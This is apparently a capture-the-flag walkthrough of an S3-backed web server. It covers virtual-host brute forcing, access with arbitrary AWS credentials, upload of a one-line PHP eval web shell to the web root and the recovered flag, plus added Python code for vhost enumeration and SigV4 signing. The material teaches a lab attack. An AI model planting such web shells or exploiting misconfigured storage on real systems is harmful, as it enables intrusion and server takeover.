Task 1
How many TCP ports are open?
sudo nmap -sS -Pn <IP> --min-rate 1000
2
Task 2
What is the domain of the email address provided in the “Contact” section of the website?
thetoppers.htb
Task 3
In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
/etc/hosts
Task 4
Which sub-domain is discovered during further enumeration?
The intent here is that you first resolve thetoppers.htb to the target IP and then brute-force virtual hosts under it:
# echo "<target IP> thetoppers.htb" >> /etc/hosts
-word.txt-
s1
s2
s3
s4
s5
admin
login
In practice the following command finds the subdomain s3 (gobuster 3.2 and later no longer append the domain to each word by default, so add --append-domain there):
$ gobuster vhost -u http://thetoppers.htb -w ./word.txt -t 120
Add the s3 subdomain to /etc/hosts as well, on the same line as the parent domain:
<target IP> thetoppers.htb s3.thetoppers.htb
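The logic gobuster vhost runs above, written out so the comparison step is visible. This is an added example, not part of the original writeup or the gobuster project: it requests the same URL with a different Host header per word and reports any host whose reply differs from a baseline taken with a random name that cannot exist. The two fake fetchers and their status/size values are constructed stand-ins for the target so the code runs offline; http_fetch is the real one.

```python
"""Virtual-host discovery as `gobuster vhost` performs it (added example, constructed data)."""
import itertools
import urllib.error
import urllib.request
import uuid
from typing import Callable, Iterable, List, Tuple

Response = Tuple[int, int]                 # (HTTP status, body length)
Fetcher = Callable[[str, str], Response]   # (url, Host header value) -> Response


def http_fetch(url: str, host: str, timeout: float = 5.0) -> Response:
    """Real fetcher: GET `url` while overriding the Host header (needs network access)."""
    req = urllib.request.Request(url, headers={"Host": host, "User-Agent": "vhost-enum"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, len(resp.read())
    except urllib.error.HTTPError as err:  # 403/404 replies are still answers worth comparing
        return err.code, len(err.read())


def find_vhosts(url: str, base_domain: str, words: Iterable[str],
                fetch: Fetcher) -> List[Tuple[str, Response]]:
    """Return (hostname, response) for every word whose vhost answers unlike the default one."""
    def probe() -> Response:
        # A random label is as good as certainly not configured on the server.
        return fetch(url, f"{uuid.uuid4().hex}.{base_domain}")

    # Two baselines: if they disagree, the default page is dynamic (length changes per
    # request) and only the status code is trustworthy. gobuster's --exclude-length is
    # the manual version of this check.
    base_a, base_b = probe(), probe()
    dynamic = base_a != base_b

    def is_hit(r: Response) -> bool:
        return r[0] != base_a[0] if dynamic else r != base_a

    hits = []
    for word in words:
        host = f"{word}.{base_domain}"
        r = fetch(url, host)
        if is_hit(r):
            hits.append((host, r))
    return hits


# Constructed stand-ins for the target so the logic runs offline. The numbers are invented.
def fake_fetch_static(url: str, host: str) -> Response:
    """Default vhost always returns the same page; only s3 answers differently."""
    return (404, 21) if host == "s3.thetoppers.htb" else (200, 11952)


_counter = itertools.count(5000)


def fake_fetch_dynamic(url: str, host: str) -> Response:
    """Default page changes length on every request (think a per-request token); s3 still differs."""
    return (404, 21) if host == "s3.thetoppers.htb" else (200, next(_counter))


WORDLIST = ["s1", "s2", "s3", "s4", "s5", "admin", "login"]  # the word.txt from above

if __name__ == "__main__":
    for name, fetch in (("static", fake_fetch_static), ("dynamic", fake_fetch_dynamic)):
        print(name, find_vhosts("http://thetoppers.htb/", "thetoppers.htb", WORDLIST, fetch))
    # Against the real box:
    # find_vhosts("http://<target IP>/", "thetoppers.htb", WORDLIST, http_fetch)
```

The baseline is taken twice on purpose: a site that embeds a changing token in every page would otherwise flag every word in the list as a hit, which is the usual reason a vhost scan "finds" hundreds of hosts.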
Task 5
Which service is running on the discovered sub-domain?
Amazon S3
Task 6
Which command line utility can be used to interact with the service running on the discovered sub-domain?
awscli
Task 7
Which command is used to set up the AWS CLI installation?
Install the awscli package, then run the configure step. The author invokes the CLI as a module of a local Python build; the usual entry point is the aws binary. Any values can be entered at the prompts, since the target accepts arbitrary credentials (see the Question section below):
$ ./python -m awscli configure
aws configure
Task 8
What is the command used by the above utility to list all of the S3 buckets?
$ ./python -m awscli --endpoint-url http://s3.thetoppers.htb/ s3 ls
aws s3 ls
Task 9
This server is configured to run files written in what web scripting language?
List the objects in the bucket that the previous command showed:
$ ./python -m awscli --endpoint-url http://s3.thetoppers.htb/ s3 ls s3://thetoppers.htb
The bucket holds the website's files, and they are PHP:
php
Flag
-shell.php-
<?php eval($_GET["cmd"]);?>
$ ./python -m awscli --endpoint-url http://s3.thetoppers.htb/ s3 cp /home/martin/shell/shell.php s3://thetoppers.htb
Upload succeeded. The bucket backs the web root, so the file is now reachable as http://thetoppers.htb/shell.php. Because the shell uses eval(), the cmd parameter must be PHP source (for example system('id');), not a bare shell command as it would be with system($_GET["cmd"]).
a980d99281a28d638ac68b9bf9453c2b
Question
- Why can the attacker access the bucket right after running aws configure with made-up credentials?
The access control policy of the target S3 endpoint permits access with these arbitrary credentials: it never checks that the key pair exists or that it is authorised for the bucket. Anyone who can reach s3.thetoppers.htb can therefore list and add objects at will.
- Attack path
Attacker brute-forces subdomains and finds that the site uses Amazon S3 storage -> locates the endpoint s3.thetoppers.htb -> attacker makes up credentials -> (the endpoint enforces no access control) attacker lists and uploads objects -> the uploaded PHP is served and executed by the web server -> control of the server
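To make the answer above concrete, here is what the commands in Tasks 7 and 8 and the upload step actually put on the wire. This is an added example, not code from the original writeup or from the AWS CLI: a standard-library Signature Version 4 signer that builds the headers for ListBuckets (aws s3 ls) and PutObject (aws s3 cp) against the discovered endpoint. The signature is computed entirely on the client from whatever key pair aws configure stored, so a client can always produce a well-formed signature from made-up keys; only the server can reject it, and this target does not. The endpoint name s3.thetoppers.htb and bucket thetoppers.htb are from the walkthrough; the credentials AKIAJUNK/junksecret and the region us-east-1 (the CLI default) are assumptions; the known-answer vector is the GET Object example published in the AWS S3 SigV4 documentation.

```python
"""SigV4 signing of the S3 requests sent by the walkthrough (added example, stdlib only)."""
import datetime
import hashlib
import hmac
import urllib.request
from urllib.parse import quote

EMPTY_SHA256 = hashlib.sha256(b"").hexdigest()


def _hmac(key: bytes, msg: str) -> bytes:
    return hmac.new(key, msg.encode(), hashlib.sha256).digest()


def sign_s3_request(method, host, path, headers, body, access_key, secret_key,
                    amz_date, region="us-east-1"):
    """Return the request headers plus a SigV4 Authorization header for one S3 request.

    amz_date is the basic ISO 8601 timestamp (e.g. 20130524T000000Z) and also becomes
    the x-amz-date header. Query strings are not handled; none are needed here.
    """
    payload_hash = hashlib.sha256(body).hexdigest()
    # Canonical headers: lower-case names, trimmed and whitespace-collapsed values.
    hdrs = {k.lower(): " ".join(v.split()) for k, v in headers.items()}
    hdrs.update({"host": host, "x-amz-date": amz_date,
                 "x-amz-content-sha256": payload_hash})
    signed_headers = ";".join(sorted(hdrs))
    canonical_headers = "".join(f"{k}:{hdrs[k]}\n" for k in sorted(hdrs))
    canonical_request = "\n".join([
        method, quote(path, safe="/~"), "",   # S3 single-encodes the path; empty query
        canonical_headers, signed_headers, payload_hash])
    datestamp = amz_date[:8]
    scope = f"{datestamp}/{region}/s3/aws4_request"
    string_to_sign = "\n".join(["AWS4-HMAC-SHA256", amz_date, scope,
                                hashlib.sha256(canonical_request.encode()).hexdigest()])
    # Signing key: chained HMACs rooted in the secret. Any secret yields *some* key;
    # nothing on the client side can tell a real AWS secret from a made-up one.
    k = _hmac(("AWS4" + secret_key).encode(), datestamp)
    for part in (region, "s3", "aws4_request"):
        k = _hmac(k, part)
    signature = hmac.new(k, string_to_sign.encode(), hashlib.sha256).hexdigest()
    hdrs["authorization"] = (f"AWS4-HMAC-SHA256 Credential={access_key}/{scope}, "
                             f"SignedHeaders={signed_headers}, Signature={signature}")
    return hdrs


def aws_doc_vector_signature():
    """Known-answer check: the GET Object example from the AWS S3 SigV4 documentation."""
    h = sign_s3_request("GET", "examplebucket.s3.amazonaws.com", "/test.txt",
                        {"Range": "bytes=0-9"}, b"",
                        "AKIAIOSFODNN7EXAMPLE", "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
                        "20130524T000000Z")
    return h["authorization"].rsplit("Signature=", 1)[1]


def list_buckets_request(endpoint_host, access_key, secret_key, amz_date):
    """Headers for `aws s3 ls`: ListBuckets is GET / on the endpoint."""
    return sign_s3_request("GET", endpoint_host, "/", {}, b"", access_key, secret_key, amz_date)


def put_object_request(endpoint_host, bucket, key, body, access_key, secret_key, amz_date):
    """Headers for `aws s3 cp <file> s3://<bucket>/<key>`: path-style PutObject."""
    return sign_s3_request("PUT", endpoint_host, f"/{bucket}/{key}",
                           {"Content-Type": "application/octet-stream"}, body,
                           access_key, secret_key, amz_date)


def send(endpoint_host, method, path, headers, body=b"", scheme="http"):
    """Perform a signed request for real (network access; not used by the offline demo)."""
    req = urllib.request.Request(f"{scheme}://{endpoint_host}{path}", data=body or None,
                                 method=method, headers=headers)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    now = datetime.datetime.now(datetime.timezone.utc).strftime("%Y%m%dT%H%M%SZ")
    # Assumed, made-up credentials: the target accepts them because it never verifies the signature.
    hdrs = list_buckets_request("s3.thetoppers.htb", "AKIAJUNK", "junksecret", now)
    print(hdrs["authorization"])
    print("doc vector ok:", aws_doc_vector_signature()
          == "f0e8bdb87c964420e857bd35b5d6ed310bd44f0170aba48dd91039c6036bdb41")
```

The Credential field carries the access key in the clear and the signature is an HMAC over the request, so a server that wants to check it must look the key up and recompute the HMAC with the matching secret. Skipping that lookup is exactly the misconfiguration the walkthrough exploits: the header still looks right, but it proves nothing.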